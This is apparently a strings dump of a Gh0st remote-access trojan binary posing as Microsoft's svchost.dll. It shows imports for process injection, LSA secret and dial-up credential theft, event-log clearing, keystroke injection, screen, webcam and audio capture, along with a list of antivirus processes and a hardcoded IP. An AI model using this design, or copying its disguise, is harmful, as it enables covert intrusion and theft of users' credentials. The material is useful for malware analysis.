!This program cannot be run in DOS mode.
`.rdata
@.data
V@j QR
GD]_[Y
L$$j\Q
tJ<\u8
D$lRPj
D$(RPj
L$4QRRRRRU
<AtG<BtC
D$$RPU
|$<.tK
D$<PVh\
D$\PWVh
L$0Ph0
L$0Ph0
QRPPPPPPVP
|$`j/W
T$dQRP
T$ QRj
D$TSUVW
NDSUPQ
FhURUPQ
l$(VW3
~0;~,}
VDPQRUSP
NPRPUSj
L$@_^][d
|$$MZu'
D$,RPQ
L$@jdQV
D$ IV32
D$$MP42
D$(cvid
Phvidc
WSAIoctl
WS2_32.dll
SHDeleteKeyA
SHLWAPI.dll
??2@YAPAXI@Z
??3@YAXPAX@Z
__CxxFrameHandler
memmove
strstr
_CxxThrowException
strchr
malloc
_except_handler3
strrchr
strncat
realloc
_beginthreadex
MSVCRT.dll
??1type_info@@UAE@XZ
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
CreateEventA
CloseHandle
TerminateThread
WaitForSingleObject
SetEvent
ResumeThread
CreateThread
InitializeCriticalSection
DeleteCriticalSection
VirtualFree
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
ResetEvent
InterlockedExchange
CancelIo
lstrlenA
GetPrivateProfileSectionNamesA
lstrcatA
lstrcpyA
GetWindowsDirectoryA
FreeLibrary
GetProcAddress
LoadLibraryA
MultiByteToWideChar
WideCharToMultiByte
lstrcmpA
GetPrivateProfileStringA
GetVersionExA
DeleteFileA
GetLastError
CreateDirectoryA
GetFileAttributesA
CreateProcessA
GetDriveTypeA
GetDiskFreeSpaceExA
GetVolumeInformationA
GetLogicalDriveStringsA
FindClose
LocalFree
FindNextFileA
LocalReAlloc
FindFirstFileA
LocalAlloc
RemoveDirectoryA
GetFileSize
CreateFileA
ReadFile
SetFilePointer
WriteFile
MoveFileA
GetModuleFileNameA
GetSystemDirectoryA
GetCurrentProcess
CreateRemoteThread
WriteProcessMemory
VirtualAllocEx
OpenProcess
MoveFileExA
GetLocalTime
ExpandEnvironmentStringsA
GetTickCount
GlobalFree
GlobalUnlock
GlobalLock
GlobalAlloc
GlobalSize
GetStartupInfoA
CreatePipe
DisconnectNamedPipe
TerminateProcess
PeekNamedPipe
WaitForMultipleObjects
OutputDebugStringA
GlobalMemoryStatusEx
GetSystemInfo
SetErrorMode
LocalSize
Process32Next
Process32First
CreateToolhelp32Snapshot
lstrcmpiA
GetCurrentThreadId
GetModuleHandleA
KERNEL32.dll
DispatchMessageA
TranslateMessage
GetMessageA
wsprintfA
CharNextA
GetWindowTextA
LoadCursorA
DestroyCursor
BlockInput
SystemParametersInfoA
SendMessageA
keybd_event
MapVirtualKeyA
SetCapture
WindowFromPoint
SetCursorPos
mouse_event
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
GetClipboardData
GetSystemMetrics
SetRect
GetDesktopWindow
ReleaseDC
GetCursorInfo
GetCursorPos
ExitWindowsEx
GetWindowThreadProcessId
IsWindowVisible
EnumWindows
CloseDesktop
SetThreadDesktop
OpenInputDesktop
GetUserObjectInformationA
GetThreadDesktop
OpenDesktopA
PostMessageA
CreateWindowExA
CloseWindow
IsWindow
USER32.dll
SelectObject
CreateDIBSection
CreateCompatibleDC
DeleteObject
DeleteDC
BitBlt
GetDIBits
CreateCompatibleBitmap
GDI32.dll
IsValidSid
LookupAccountNameA
LsaClose
LsaRetrievePrivateData
LsaOpenPolicy
LsaFreeMemory
RegCloseKey
RegQueryValueA
RegOpenKeyExA
CloseServiceHandle
DeleteService
ControlService
QueryServiceStatus
OpenServiceA
OpenSCManagerA
RegSetValueExA
RegQueryValueExA
RegOpenKeyA
CloseEventLog
ClearEventLogA
OpenEventLogA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegEnumValueA
RegEnumKeyExA
RegDeleteValueA
RegDeleteKeyA
RegCreateKeyExA
LookupAccountSidA
GetTokenInformation
ADVAPI32.dll
SHGetSpecialFolderPathA
SHGetFileInfoA
SHELL32.dll
waveOutClose
waveOutUnprepareHeader
waveOutReset
waveInClose
waveInUnprepareHeader
waveInReset
waveInStop
waveOutWrite
waveInStart
waveInAddBuffer
waveInPrepareHeader
waveInOpen
waveInGetNumDevs
waveOutPrepareHeader
waveOutOpen
waveOutGetNumDevs
WINMM.dll
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
?_Xran@std@@YAXXZ
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
MSVCP60.dll
IMM32.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
WININET.dll
capGetDriverDescriptionA
capCreateCaptureWindowA
ICSeqCompressFrame
ICSeqCompressFrameStart
ICSendMessage
ICOpen
ICClose
ICCompressorFree
ICSeqCompressFrameEnd
AVICAP32.dll
MSVFW32.dll
GetModuleFileNameExA
EnumProcessModules
PSAPI.DLL
WTSFreeMemory
WTSQuerySessionInformationA
WTSAPI32.dll
_strnicmp
_strcmpi
bad Allocate
bad buffer
Microsoft\Network\Connections\pbk\rasphone.pbk
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
Documents and Settings\
ConvertSidToStringSidA
advapi32.dll
L$_RasDefaultCredentials#0
RasDialParams!%s#0
Device
PhoneNumber
DialParamsUID
WinSta0\Default
%s\shell\open\command
%s\*.*
%s%s%s
%s%s*.*
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\
\flyboy.dat
Gh0st Update
Applications\iexplore.exe\shell\open\command
System
Security
Application
SeDebugPrivilege
CloseHandle
kernel32.dll
SHDeleteKeyA
shlwapi.dll
CloseServiceHandle
DeleteService
StartServiceA
ControlService
QueryServiceStatus
OpenServiceA
OpenSCManagerA
\flyboy.log
%d%d%d%d%d%d.bak
PPPPPP
REG_BINARY
%-24s %-15s
REG_MULTI_SZ
%-24s %-15s 0x%x(%d)
REG_DWORD
%-24s %-15s %s
REG_EXPAND_SZ
REG_SZ
\cmd.exe
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
HARDWARE\DESCRIPTION\System\CentralProcessor\0
tw2.exe
wow.exe
QQhxgame.exe
xy3.exe
xy2.exe
dnf.exe
mdm365.exe
dp.exe
my.exe
ashDisp.exe
avcenter.exe
TMBMSRV.exe
knsdtray.exe
kxetray.exe
egui.exe
Mcshield.exe
360sd.exe
RavMonD.exe
KvMonXP.exe
avp.exe
360tray.exe
WWWWWW
VVVVVV
121.196.49.217
SeShutdownPrivilege
explorer.exe
Winlogon
Mozilla/4.0 (compatible)
CVideoCap
#32770
.?AVtype_info@@
jjjjjj
jjjjjjjjh
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Device Protect Application
FileVersion
3, 6, 0, 0
InternalName
Microsoft(R) Windows(R) Operating System
LegalCopyright
Copyright ? 2008
LegalTrademarks
OriginalFilename
svchost.dll
PrivateBuild
ProductName
Microsoft(R) Windows(R) Operating System
ProductVersion
3, 6, 0, 0
SpecialBuild
VarFileInfo
Translation